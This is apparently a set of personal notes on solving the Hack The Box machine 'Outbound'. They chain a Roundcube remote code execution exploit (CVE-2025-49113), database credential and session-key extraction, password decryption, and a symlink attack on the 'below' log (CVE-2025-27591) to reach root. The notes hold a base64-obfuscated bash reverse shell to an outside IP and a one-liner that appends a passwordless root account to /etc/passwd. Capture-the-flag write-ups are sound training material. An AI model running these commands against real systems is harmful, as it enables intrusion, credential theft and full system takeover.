Skip to content

Back

Outbound

  • Hack The Box

  • nmap gives 80/tcp open http nginx 1.24.0 (Ubuntu)

[!hint] From machine info: CVE-2025-49113, which demonstrates post-authenticated remote code execution via PHP object deserialization -> FearsOff research ~~RCE PoC~~ CVE-2025-49113 - Roundcube Remote Code Execution + discover an amazing tool: Penelope CVE-2025-27591 - Symlink Attack in /var/log/below/error_root.log internal tool called decrypt.sh, we can extract the plaintext value of the password, which allows access to Roundcube as Jacob

php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 "printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuMTAuMTUuMTI5LzQ0NDQgMD4mMSkgJg==|base64 -d|bash"

-> payload from penelope

[!fix]: Rewrite in nim/rust/go/zig? or fix this - zwique exp.py

  • search in - www-data@mail:/var/www/html/roundcube/config and get credentials from config.inc.php: $config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube'; + gets encryption key: $config['des_key'] = 'rcmail-!24ByteDESkey*Str';
  • enumerate databases - mysql -u roundcube -pRCDBPass2025 -e "show databases;" -> roundcube
  • get base64 encoded vars from session table -> decode and get encrypted password

Password decryption

  • via /var/www/html/roundcube/bin/decrypt.sh
  • (from oxdf write-up) via python + CyberChef
>>> from base64 import b64decode
>>> iv_ct = b64decode('hcVCSNXOYgUXvhArn1a1OHJtDck+CFME')
# It gets decoded into raw bytes:
# The result is 24 bytes (hex):
# 85 c5 42 48 d5 ce 62 05 17 be 10 2b 9f 56 b5 38 72 6d 0d c9 3e 08 53 04
>>> iv = iv_ct[:8] # first 8 bytes (Initialization Vector) "random nudge": '85c54248d5ce6205' - keeps identical messages from producing identical ciphertext
>>> ct = iv_ct[8:] # everything after (Ciphertext): '17be102b9f56b538726d0dc93e085304'
>>> iv.hex()
'85c54248d5ce6205'
>>> ct.hex()
'17be102b9f56b538726d0dc93e085304'
# from here use the key and CyberChef

  • all in CyberChef

  • login with this password to jacob account (web) and from mails get ssh password

  • use CVE-2025-27591 - symlink /etc/passwd -> /var/log/below/error_root.log, rerun below and able to write to passwd: echo -e 'idapp::0:0:idapp:/root:/bin/bash\n' >> /etc/passwd
  • su - idapp ⚐ ◝(ᵔᗜᵔ)◜